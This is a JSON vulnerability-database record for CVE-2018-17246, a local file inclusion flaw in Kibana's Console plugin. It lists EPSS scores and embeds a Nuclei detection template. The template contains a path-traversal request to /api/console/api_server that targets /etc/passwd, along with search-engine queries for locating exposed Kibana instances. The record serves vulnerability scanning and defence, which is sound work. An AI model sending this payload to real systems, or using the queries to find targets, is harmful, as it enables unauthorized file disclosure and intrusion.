{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2018-17246/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2018-17246/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2018-17246/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2018-17246/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2018-17246/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2018-17246"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2018-17246"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.82251,
      "kev": false,
      "percentile": 0.99642
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2018/CVE-2018-17246.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2018-17246\n\ninfo:\n  name: Kibana - Local File Inclusion\n  author: princechaddha,thelicato\n  severity: critical\n  description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.\n  impact: |\n    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further attacks.\n  remediation: |\n    Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.\n  reference:\n    - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md\n    - https://www.elastic.co/community/security\n    - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-17246\n    - https://access.redhat.com/errata/RHBA-2018:3743\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-17246\n    cwe-id: CWE-829,CWE-73\n    epss-score: 0.82251\n    epss-percentile: 0.99642\n    cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: elastic\n    product: kibana\n    shodan-query: http.title:\"kibana\"\n    fofa-query: title=\"kibana\"\n    google-query: intitle:\"kibana\"\n  tags: cve,cve2018,lfi,kibana,vulhub,elastic,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"\\\"message\\\":\\\"An internal server error occurred\\\"\"\n\n      - type: word\n        part: header\n        words:\n          - \"kbn-name\"\n          - \"kibana\"\n        case-insensitive: true\n        condition: or\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n# digest: 4a0a004730450221009c8dff4ed2ea572791dc11c02263d0bbc5b7f909349d38bc2fc0e8254fc0f8e902201a347f5dc7bf4fea9d3c0b1abdf7617bcf661c5588dae7db9119b2092de5eac5:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2018-17246"
}